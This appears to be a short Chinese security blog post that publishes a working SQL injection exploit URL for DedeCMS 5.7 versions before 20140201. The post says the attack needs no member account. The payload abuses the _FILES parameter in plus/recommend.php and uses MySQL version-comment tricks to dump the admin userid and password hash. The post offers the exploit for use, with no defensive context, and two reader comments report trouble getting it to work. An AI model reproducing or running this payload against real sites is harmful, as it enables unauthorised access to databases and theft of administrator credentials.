DedeCMS 20140201 之前的5.7通杀

2015-01-28
安全
2 条评论
3.91K次阅读

无需注册会员账号：

Exp:plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]='
or mid=@`'` /*!50000union*//*!50000select*/1,2,3,(select
CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`
limit+0,1),5,6,7,8,9%23@`'`+&_FILES[type][name]=1.jpg&_FILES[type]
[type]=application/octet-stream&_FILES[type][size]=111

转载请注明来自WebShell'S Blog，本文地址：https://www.webshell.cc/4655.html

已有 2 条评论

1111

2017/12/22 14:59

显示Request Error!

回复
littlejoln

2015/02/10 17:47

弄了几个，没搞得。估计是版本问题。具体操作能做例子么？

回复

添加新评论

上一篇: Quarks PwDump各种32位64系统获取HASH
下一篇: Discuz!X系列转换工具任意代码写入漏洞 getshell